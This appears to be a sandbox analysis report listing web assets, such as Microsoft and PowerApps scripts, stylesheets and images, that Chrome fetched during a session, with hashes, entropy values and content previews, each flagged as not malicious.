                                                                                                                                                                                                          Entropy (8bit):5.596324920359172
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:EFkYe2qD3D1Ug5yKiXcvh5kCThY6g3Eh6rtLMs5M:SY5yKiSin7RFy
                                                                                                                                                                                                          MD5:1986FCF12655BE6003E39A655BEB6F0F
                                                                                                                                                                                                          SHA1:0C90899E47927E6D63E445B6BFE9C986E8621830
                                                                                                                                                                                                          SHA-256:F66185BEC9D95EC9E4C49D1B38F433AB51AEF9853B21B5D3C0DA54F3987EAF0C
                                                                                                                                                                                                          SHA-512:FAD912AC31C6297A4D4EAA4FC263C5EF8ECA0281D79213B64CE606BBC124B0BFD7F1CADF47C34560406AC804EEF87922E25F7D054B3C539F3AE95D30C8EE7FAB
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/*! Static Override Utilities */.(()=>{window.SOUtil=window.SOUtil||{addStylesheet:(cssStyles,overrideId)=>{const style=document.createElement("style");if(overrideId){style.id="static-override-"+overrideId}style.appendChild(document.createTextNode(cssStyles));document.head.appendChild(style)},pageIsInScope:pageScope=>{const host=location.hostname;const path=location.pathname;const locale=document.documentElement.lang.toLowerCase();const getMarket=marketAware=>{const locale=document.documentElement.lang.toLowerCase();const langCode=locale.split("-")[0];const market=new URLSearchParams(location.search).get("market")?.toLowerCase();if(market&&marketAware!==false){return`${langCode}-${market}`}return locale};const langLocs={"sr-rs":["sr-rs","sr-latn-rs","sr-cyrl-rs"],default:[locale]};const possibleLangLocs=langLocs[locale]||langLocs.default;const pathLocale=possibleLangLocs.find(loc=>path.indexOf(loc)!==-1);const pathNoLocale=path.replace(`/${pathLocale}`,"").replace(/\/$/,"");const previ
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):836
                                                                                                                                                                                                          Entropy (8bit):6.944112371702667
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12:+cK/gj6qWhaFBzC6l1xWYJwq13qKZeQeyVFDZemrwN2pG1nxgloTsNN5m:+cKYj6LAzXLJn3ZReyfrNpG1xF
                                                                                                                                                                                                          MD5:A4D31E77D95CABD70E5D88128E03F114
                                                                                                                                                                                                          SHA1:AA682837F93B9956F81C387EC850EDA852ACE98B
                                                                                                                                                                                                          SHA-256:214A848E042AAE43FFF9C74154FCE5331503F71DB2FC430C62C027C3F93B3311
                                                                                                                                                                                                          SHA-512:52F589A222AB40F0A8F5CAF8AA8F90CA371E67BB6AA2E17C36B8103EDB1232218AB6357ACA8C26D09BB6D706CA515EAC58197BE82E7286C58EDC24BB256E1011
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/Social_Media_Logo_FB?scl=1
                                                                                                                                                                                                          Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D................*...(iinf..........infe........av01Color....jiprp...Kipco....ispe................pixi............av1C........colrnclx...........ipma..................2mdat........h...B2......Q...:w...L?....F2.9c......e.n[...X..A..Aa.?..2.._.y.8.h....n....4..........~.i....j...}r....lD...O......_.g..L....b..r.W$WR.3.nBe..(...".....a.a./..B......#.N..P^..[D...(5.z..;#E.X..*..1..Tb.GT2.{P^........o........G7....^i.|..".Kx..e)-.MK....u{.y..?.U..p...I$...t/_.[.x.P.3.2..t..:.ii$P.I.../...qV.VBt.....x.wLZe.g...0R.0.K'.H~..o....,Y6.A6N.-I?.b...y.yL.!..ba..\|X!u...&...g......3.....N...oI...Q..E.....<.*%...0.......a..<...f..c.p..i.F.....J. ..:,....4.r.Qa...P/.=.].UV!4.e1..Tu.?.....R..H..+NX.#i...28.4QY..
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3280
                                                                                                                                                                                                          Entropy (8bit):4.696081700274861
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:mVZw3gPuCrA3sLT1m7RArtNmOuLT2LZ0dZyMLtZ/AmVT8TZi:mVZ4gPuCQqBQRArtMOEalxMLtZ47i
                                                                                                                                                                                                          MD5:1C7E214F5AF8CAA06F783A38D40127C6
                                                                                                                                                                                                          SHA1:61F88B722FAA7A7AE86D354DBCFC1D771FF23289
                                                                                                                                                                                                          SHA-256:9EA42247944D18B77EB76FBCCAF1774559B6F312B1376002F553C4ECB827E4C5
                                                                                                                                                                                                          SHA-512:559A3FA3364B742E5915E871333C043CF27F25110D3A624D0CDDC75DEE795F8633EB0C8A3186F2088B52516C1BC3A90F13545F9415278F3A4A52992AB7E8C96C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:class OneCloudUtil {.. /**. * Get the API endpoint for the OneCloud Data Connector.. * @param {string} path - The path to append to the API endpoint.. * @param {string} querystring - The query string to add to the API endpoint.. * @returns {string} - The API endpoint with the environment specific query parameters.. */. static getMsocapiurl = (path, querystring) => {. let url = `${OneCloudEnvironmentConstants.DataConnector.endpoint}${path}`;. let envQueryParamKeys = Object.keys(OneCloudEnvironmentConstants.DataConnector.queryParams);.. // Add passed query string.. if(querystring && querystring.length > 0) {. url += `?${querystring}`;. } else if (envQueryParamKeys.length > 0) {. url += '?';. } .. // Add environment specific query parameters and return.. return OneCloudUtil.addEnvironmentSpecificQueryParams(url);;. }.. /**. * Add environment specific query parameters to the url.. * @param {string} url - The url to add the query paramete
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):3116
                                                                                                                                                                                                          Entropy (8bit):4.431505373285771
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:e2rIqX/nyqHytWO/+75xy17A6d/X226/YU3/xopLk/OEBlKj/v4UPnxzgNar4n8u:lIAvyqSRcK66dODQhYUosRZg4hpRV6
                                                                                                                                                                                                          MD5:B884EF4864D6867BD00AA4A7A5CFB368
                                                                                                                                                                                                          SHA1:D45D8BD33632588A913575910B3D0EABD5AD3828
                                                                                                                                                                                                          SHA-256:177F6B14CEB87D301946D00124195EBB755A452BA40ABCA5CF6A4E77E52222F5
                                                                                                                                                                                                          SHA-512:375A8412459BBE64B6024C462D996B4B48DE246997BA36F5E26379F163D5FACA69CECC79E4FD246F92079A23DCD36AC2E8058D2C9663BA9D31C07C6786269581
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-localstorage.min.ACSHASHb884ef4864d6867bd00aa4a7a5cfb368.js
                                                                                                                                                                                                          Preview:/*.*Utility class for handling data storage in the browser's local storage with encoding/decoding support..*Note: This class is designed for storing and retrieving objects in local storage. .*/ ..class LocalStorageUtil {. constructor(opts) {. // Set the storage key from options, defaulting to an empty object. this.storageKey = opts.storageKey || {}; . }. . /**. * Encode the value before storing in local storage. */. encodeValue = (value) => {. if(!value) {. return {};. }. . let encodedValue;. try {. encodedValue = window.btoa(JSON.stringify(value));. } catch(error) {. encodedValue = value. }. return encodedValue;. };. . /**. * Decode the value retrieved from local storage. */. decodeValue = (encodedValue) => {. if(!encodedValue) {. return {};. }. let decodedValue;. try {. decodedValue = window.atob(encodedValue); // Decode the encoded value.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (64241)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):171505
                                                                                                                                                                                                          Entropy (8bit):5.043804815226508
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:jzCPZkTP3bDLH0tfRqQ0xtLfj4ZDSIpTt813viY8R1j35Ap7LQZLPPJH7PAbOCxb:jlZAW3kJeqg
                                                                                                                                                                                                          MD5:8F186BBA557DC6140841C682AF4D60EE
                                                                                                                                                                                                          SHA1:CE2F96E57EE3D9ED15B8A2DD3EBDC7E54439AF98
                                                                                                                                                                                                          SHA-256:CDA4813A965CCD1AAA50550D08B928AAF4C7F50B6F77823213FE3A97E806C2F1
                                                                                                                                                                                                          SHA-512:17ACC430C28A171C1FD029C1B0EB67BE14ED41ED9F7F10E4040ABA1FA39B8DA5CAC7CDF979BAB6CAFAD126AA94C88D123F170E78C51745C3833AE80AD23FB36A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/onerfstatics/marketingsites-eas-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/1b-9d8ed9/c9-be0100/a6-e969ef/43-9f2e7c/82-8b5456/a0-5d3913/52-918540/ca-ae3ce4?ver=2.0&_cf=02242021_3231
                                                                                                                                                                                                          Preview:@charset "UTF-8";./*! | Copyright 2017 Microsoft Corporation | This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise.*/./*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */.body{margin:0}.context-uh
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):71856
                                                                                                                                                                                                          Entropy (8bit):5.356840443190699
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:eaO7Fjr+JSuwEql+t0T/iCewxOrIpYQj8gnI:eaOR/GqPiCXOQj8gnI
                                                                                                                                                                                                          MD5:FA8D18D4C9B1197E8532E0288D7D0920
                                                                                                                                                                                                          SHA1:B0AD25DAEAD656E47C0AD2A4DCD3AD3D1B3D0CC9
                                                                                                                                                                                                          SHA-256:B9A27B2D489A112F5A3294771FA75DC9F7A39807355CAEE4BD06A8BAB2B03E89
                                                                                                                                                                                                          SHA-512:B7D7279A045C51EB8A58AEA9F769C95292A3E7959E9589E267C12DEB1C113FCB6A79C849D557143A84B44D731030F1283194F0A5DA930FE3B2F3DED343DB2FDC
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/scripts/polyfills.min.b0ad25daead656e47c0a.js
                                                                                                                                                                                                          Preview:var marker;this.parseTimeMarkers=this.parseTimeMarkers||{},(marker=this.parseTimeMarkers["polyfills.min.js"]||(this.parseTimeMarkers["polyfills.min.js"]={})).startEval=window.jsCommon&&window.jsCommon.performance&&window.jsCommon.performance.now?window.jsCommon.performance.now():Date.now(),window.perfTracking&&window.perfTracking.startBundleEval&&window.perfTracking.startBundleEval("polyfills.min.js"),function(){"use strict";var t={7573:function(){!function(t){var e=t.performance;function n(t){e&&e.mark&&e.mark(t)}function r(t,n){e&&e.measure&&e.measure(t,n)}n("Zone");var o=t.__Zone_symbol_prefix||"__zone_symbol__";function i(t){return o+t}var a=!0===t[i("forceDuplicateZoneCheck")];if(t.Zone){if(a||"function"!=typeof t.Zone.__symbol__)throw new Error("Zone already loaded.");return t.Zone}class s{static{this.__symbol__=i}static assertZonePatched(){if(t.Promise!==Z.ZoneAwarePromise)throw new Error("Zone.js has detected that ZoneAwarePromise `(window|global).Promise` has been overwritten.
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:C++ source, ASCII text
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):13110
                                                                                                                                                                                                          Entropy (8bit):4.53925643908527
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:tSsg7eeMXX3/4WKtr0hi6QIG0LHDiX+JLBJ:csMedHgWKtJEGYjC+JLBJ
                                                                                                                                                                                                          MD5:42FFFAB3ACD04EA132F8C11D5E26059F
                                                                                                                                                                                                          SHA1:66A844D51A5ED1A66DDB733216A7A2EB25A5729F
                                                                                                                                                                                                          SHA-256:2F495FCAD3C118DBB2E28E094960E942974B43BDA1A9F1243CBA290DADFF0D1D
                                                                                                                                                                                                          SHA-512:10A8A51FC663D18FBB7AE39B01DB347CF383EE60A2FB5F758589C06BBD2FAD7A9C2B0E5C54639AC1EDA35426A646458E74F46944C1551E43AA6FCD6B4640DC3C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/market-selector/v1/market-selector/clientlibs/sites/base.min.ACSHASH42fffab3acd04ea132f8c11d5e26059f.js
                                                                                                                                                                                                          Preview:(() => {. /** Create ocrReimagine namespace */. if (!window.ocrReimagine) {. window.ocrReimagine = {};. }.. /** Create Market Selector module namespace */. if (!window.ocrReimagine.MarketSelector) {. window.ocrReimagine.MarketSelector = {};. }.. const cookieExpiryDays = 30;. const cookieKey = 'PMGSKUMarketCk';. /** @type {MarketSelector[]} */. const instances = [];. const queryParamKey = 'market';.. /**. * CSS selector.. * @enum {string}. */. const Selector = {. AFFECTED: '[data-oc-market-selector]',. DATA_MOUNT: '[data-mount="market-selector"]',. FW_LINKS: '[data-regenerate-fwlink="true"]',. SELECT_MENU: '.custom-select-input'. };.. /**. * JS event name.. * @enum {string}. */. const EventName = {. ON_INIT: 'onInit',. ON_REFRESHED: 'onRefreshed',. ON_REMOVE: 'onRemove',. ON_SELECT: 'onSelect',. ON_UPDATE: 'onUpdate'. };.. /**. *
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4143), with CRLF, LF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):73972
                                                                                                                                                                                                          Entropy (8bit):5.358443959593022
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:tiWlPegosdkA/XrCqHWNC8GnqwhteZgDruFv:tiIV6N7GZhteZuKv
                                                                                                                                                                                                          MD5:F0ECF23EB203DB253FF4FE76CCF3E634
                                                                                                                                                                                                          SHA1:1F04F34657610A03812AA06F9C7FDFA511D21C05
                                                                                                                                                                                                          SHA-256:53F5A4F91EA1041AEE333E666E7E5DE3F2A329189B0A121852CFBA3FD01C46A5
                                                                                                                                                                                                          SHA-512:A69B4EB7D4CD8EAA5CCA3854359674CD53A1D6DA5D0CCF48DBABAC1BED43EAC08F8F019532BBFB56596A96AD103BC93C774F0293589A6FD11E9214C6883A96A4
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:.this.parseTimeMarkers = this.parseTimeMarkers || {};.var marker = this.parseTimeMarkers['lodash.bundle.min.js'] || (this.parseTimeMarkers['lodash.bundle.min.js'] = {});.marker.startEval = window.jsCommon && window.jsCommon.performance && window.jsCommon.performance.now ? window.jsCommon.performance.now() : Date.now(); marker.isExternal = false;.if (window.perfTracking && window.perfTracking.startBundleEval) window.perfTracking.startBundleEval('lodash.bundle.min.js');/**.. * @license.. * Lodash <https://lodash.com/>.. * Copyright OpenJS Foundation and other contributors <https://openjsf.org/>.. * Released under MIT license <https://lodash.com/license>.. * Based on Underscore.js 1.8.3 <http://underscorejs.org/LICENSE>.. * Copyright Jeremy Ashkenas, DocumentCloud and Investigative Reporters & Editors.. */..(function(){function n(n,t,r){switch(r.length){case 0:return n.call(t);case 1:return n.call(t,r[0]);case 2:return n.call(t,r[0],r[1]);case 3:return n.call(t,r[0],r[1],r[2])}return n.ap
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):132654
                                                                                                                                                                                                          Entropy (8bit):5.06998373835822
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:OLnkGW46wgLjQfjBYfvp3/9fNeNzIqNhb:JGxgKTzIqNhb
                                                                                                                                                                                                          MD5:75C58DC418FD8AA2130C968DDE31C8B2
                                                                                                                                                                                                          SHA1:56AD1156C9C0457AAB815623672DD296AE34A35C
                                                                                                                                                                                                          SHA-256:2AFA2BC08ABC19B0FF9335EAC62780271C245C3A99AF7973A5E58F7515141912
                                                                                                                                                                                                          SHA-512:4C36DE66B68701539A843617FA2C36096A3C1A14187B58BD4D005F3F4C14E52AF41EBD37F3291C69D7FFA39924C468561DC79F833944835E625E4A6A12A7BB7A
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://content.powerapps.com/resource/powerbiwfe/styles/powerbi.min.56ad1156c9c0457aab81.css
                                                                                                                                                                                                          Preview:.usernotifications{font-family:'Segoe UI',wf_segoe-ui_normal,helvetica,arial,sans-serif;font-size:12px}.usernotifications button{font-family:'Segoe UI',wf_segoe-ui_normal,helvetica,arial,sans-serif}html[data-focus-source=key] .usernotifications button:focus{box-shadow:var(--focus-box-shadow-definition,0 0 0 4px) var(--focus-box-shadow-white-color,#fff)!important;border:var(--focus-outline-definition,2.5px solid) var(--focus-box-shadow-color,#000)!important;box-sizing:border-box}.usernotifications header{height:100px}.usernotifications header button{background:0 0;border:none}.usernotifications header .notificationheader .headercontainer{float:left;padding-top:20px}.usernotifications header .notificationheader .headercontainer .heading{color:var(--neutral-secondary-color,#666);font-family:wf_standard-font,helvetica,arial,sans-serif;letter-spacing:.04375em;text-transform:uppercase}.usernotifications header .notificationheader .headercontainer .subheading{font-size:24px}.usernotifications
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (584)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):5006
                                                                                                                                                                                                          Entropy (8bit):5.254875250489264
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tYVv5eMnTpQA9CsC9MCCu2Axzwxf1QiEbyhTlZhZF4ntl:tOwMTpP9jUnN2Izwxf1hhTNZF4ntl
                                                                                                                                                                                                          MD5:2954890B89E77EADECA4558085241308
                                                                                                                                                                                                          SHA1:EE0E88A398434019AAA6EA8A38867494C585B31A
                                                                                                                                                                                                          SHA-256:06E35DF1A5074DA424B0FFB0BE44F5DAE4209C8C52F1F9C2FC53572509031831
                                                                                                                                                                                                          SHA-512:737CFA7B339504B4667D1AECD33C84F6E6FF9115CBA2C503126108D38B32326AE934BCC24F39116B3E6010D61489290DC9FB86B0625D9CC7082B426339F4E3F1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/atomic/tabs/v2/tabs/clientlib/sites.min.ACSHASH2954890b89e77eadeca4558085241308.js
                                                                                                                                                                                                          Preview:'use strict';class FilterPanel{constructor(e){this.WRAPPER_ELEMENTS={tabList:e.tabList,tabPanel:e.tabPanel};this.SELECTORS={tabsWrapper:".tabs-wrapper",activeTab:".tab.active",activePillItem:".tab-panel.active .pill-bar__item.active",cardCarouselContainer:".appsource-grid-container",tabRole:"[role\x3dtab]"};this.MAPS={wrapperElements:{tabList:e.tabList,tabPanel:e.tabPanel},tabInstances:[],filterTabData:window.appsource.filterTabData};this.STRINGS={};this.CONFIG={filterTab_urlKey:"filterTab",filter_urlKey:"",.selectedTab:"categories",selectedTabDefault:"categories",selectedFilter:"ai-machine-learning",selectedFilterDefault:"ai-machine-learning",requiredURLParams:["filterTab","categories","industries","product"],isPageLoad:!0,isTabClick:!1,popstate:!1};this.ELEMENTS={};this._updateCards=()=>{};this._updateURL=()=>{const a=new URL(window.location.href),b=this._createQueryParams();this.CONFIG.requiredURLParams.forEach(c=>{a.searchParams.delete(c)});a.searchParams.set(this.CONFIG.filterTab_
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (678)
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5243
                                                                                                                                                                                                          Entropy (8bit):5.395959363705534
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:1CSAZUwgGG0g8WrsrArzrLHSaZDeZAZkqQZqp74SfCS9H/iNf/jxvR1SPkbQ2:4SUgGG0vWrsrArzCgGzqzBoFY8D
                                                                                                                                                                                                          MD5:3DB5CF9FD3FAB92B3889302C8DE78D1B
                                                                                                                                                                                                          SHA1:1C493C13BC775036B36ACBA37941375ED0CE2ADA
                                                                                                                                                                                                          SHA-256:D29DB6171FCF5458896561430C466007D6E9709F83DF0CB950E273B93DDA7853
                                                                                                                                                                                                          SHA-512:1B13D7AA880D8987B5120FB6BB21CE53F6FB7769061E35C2BB87B59F32F176D52FC7F208461A7603EDCE26318E022B75F2CB27791C5D7A7D826B2C141D33AA70
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:'use strict';(function(){function q(){return new Promise(function(e){window.oa=window.oa||{load:!0};(function(h,k){function m(b){b+="\x3d";for(var f=decodeURIComponent(h.cookie).split(";"),g=0;g<f.length;g++){for(var a=f[g];" "===a.charAt(0);)a=a.substring(1);if(0===a.indexOf(b))return a.substring(b.length,a.length)}return""}function p(b,f){if("function"===typeof b[3])b[3](b);var g=f.createElement("script");g.type="text/javascript";g.src=b[1];g.async=b[2];g.addEventListener("load",function(){b[4](b);.e()});g.addEventListener("readystatechange",function(){"complete"===this.readyState&&b[4](b)});if(b[8])b[8]();f.getElementsByTagName("head")[0].appendChild(g)}window.oa.container||(window.oa.container=!0,!function(b,f,g,a){for(var d=f.getElementsByTagName("script"),c=0;c<b.length;c++){var l=a(g.location.search.toLowerCase(),f.cookie),n=b[c];if(-1===Array.prototype.indexOf.call(d,f.location.protocol+n[1])&&n[6]&&n[0].test(f.location.href)){if(l!==n[5]&&null!==n[5]||m("bp_"+n[7].split(" ").j
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (509)
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):775
                                                                                                                                                                                                          Entropy (8bit):5.006726191017576
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:Tb0grd1xT5FeKlqyE8J6V8JIxbMfex8mAXpydmc7:Tb9k46tCfeLAXpyIc7
                                                                                                                                                                                                          MD5:FE68B59E840A1A274393B3AB03C85E96
                                                                                                                                                                                                          SHA1:C8C1B1196B05E9ADB6D342390956A231920B2017
                                                                                                                                                                                                          SHA-256:9F01AEA27D73C422AC5E7E87C2F7F3CE364E1F940FAEB6CF3178B5E13CB43497
                                                                                                                                                                                                          SHA-512:58921A6195363008A3DD65AF8D115828C3F93FB23CCCC9FB5D2FAF7AF55F5779EFBA947B990DEDF5B2751F3ED0BA4071F006873FFB68F77CCA3C8D565092A90D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/blade/faqs/v2/faqs/clientlib/faqs.min.ACSHASHfe68b59e840a1a274393b3ab03c85e96.js
                                                                                                                                                                                                          Preview:'use strict';(function(e){e.addEventListener("DOMContentLoaded",()=>{const a=$(".faq-collapse"),f={"bi-bhvr":{off:a.data("expandbhvr"),on:a.data("collapsebhvr")},"bi-cn":{off:a.data("expand"),on:a.data("collapse")},"bi-ecn":{off:a.data("enexpand"),on:a.data("encollapse")},"bi-ct":{off:a.data("expandtemplatename"),on:a.data("collapsetemplatename")}},d=b=>{const g=b.triggerElement.classList.contains("collapsed");Object.entries(f).forEach(([h,c])=>{b.triggerElement.setAttribute(`data-${h}`,g?c.off:c.on)})},.k=window.ocrReimagine.CollapseExtension.getInstances().filter(b=>b.triggerElement.classList.contains("ocr-faq-item__header"));0<a.length&&k.forEach(b=>{b.el.addEventListener("onHidden",d.bind(this,b));b.el.addEventListener("onShown",d.bind(this,b))})})})(document);
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text, with very long lines (47992), with no line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):47992
                                                                                                                                                                                                          Entropy (8bit):5.605846858683577
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                                                                                                                                                                                                          MD5:CF3402D7483B127DED4069D651EA4A22
                                                                                                                                                                                                          SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                                                                                                                                                                                                          SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                                                                                                                                                                                                          SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):5009
                                                                                                                                                                                                          Entropy (8bit):4.532689799994779
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:O4y/XHFCgOX1a9eD7EjHSlEusxsWpcTcaUXHcKg4paUxwq9XRrlJNRCBs5KssHNK:OvXH2X1H7ySlEus2WpWG3cN4pHR9XXjl
                                                                                                                                                                                                          MD5:8F1B786599DDD1D6C94A1D907F2CB5FD
                                                                                                                                                                                                          SHA1:4E5B3082D74407777629A4EE2B5DCA1768FF0C5D
                                                                                                                                                                                                          SHA-256:20BF0322758485EE42D1480678AA5799087DAD8D0615AFCEF1448D0B34878AE3
                                                                                                                                                                                                          SHA-512:FF10A31D0A94A78BB05AF0738A28ED65580F0DF5FA13CE3E69609407EB9D174B351B2139228A926FB3747245190213E28DEEB3F4CD7CBACA281CFE3E9923B87E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:/*******************************************************************************. * Copyright 2018 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/.(function() {. "use strict";.. let count = 0;. const prefix = "__footnote";.. /**. * Jumps to elements location without being hidden by the page navigation menu (if any). * @param {Event} event . * @param {JQuery Object} jumpToEleme
                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          File Type:ISO Media, AVIF Image
                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                          Size (bytes):1249
                                                                                                                                                                                                          Entropy (8bit):7.399495937369451
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:+cKYj6LyzdTwVnbwW80mxJd8JgEpiaZfVGGj60MI4:+cKYjwyRTw54kBpJ9puJ
                                                                                                                                                                                                          MD5:B1B2DC6D89BBF2B0A53D6CDF539450AF
                                                                                                                                                                                                          SHA1:9FF6669EA52A2FDA867E97905E0C6BAF5F365F7E
                                                                                                                                                                                                          SHA-256:CC3C2A7ED65F088033282532D5BDB3C9CBFC73B870077EEC30AF33CC02D6344B
                                                                                                                                                                                                          SHA-512:77301DECDD7BF360015A78B97677E5A02C17F770F629F111CF2E73E0AD75FA8C89296F27BAC5EA438C645D657845FCA22117FE52D23E5670010DC5AB90915432
                                                                                                                                                                                                          Malicious:false
